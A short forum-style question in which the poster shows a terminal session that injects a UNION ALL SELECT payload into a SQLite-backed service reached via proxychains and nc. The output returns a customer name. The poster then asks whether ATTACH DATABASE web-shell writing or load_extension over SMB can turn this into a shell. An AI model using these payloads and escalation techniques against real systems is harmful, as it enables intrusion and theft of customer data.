I need to obtain a shell from an SQL injection over an application with sqlite database.
Currently my exploit looks like the following:
lucian@0x90:~/$ proxychains nc 10.185.10.55 1101
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9999-<><>-10.185.10.55:1101-<><>-OK
Input please:
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
Parsing results...
Customer information: Damy Roali qvzbqLOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzVqzzxq 42
lucian@0x90:~/$
Following this link http://atta.cked.me/home/sqlite3injectioncheatsheet I discovered that I can either ATTACH DATABASE (by creating a .php file in the document root of a web folder) or load_extension (by loading a dll file from an smb path) in order to gain the shell.
Is this by default in SQLite or do I need to enable something or check something?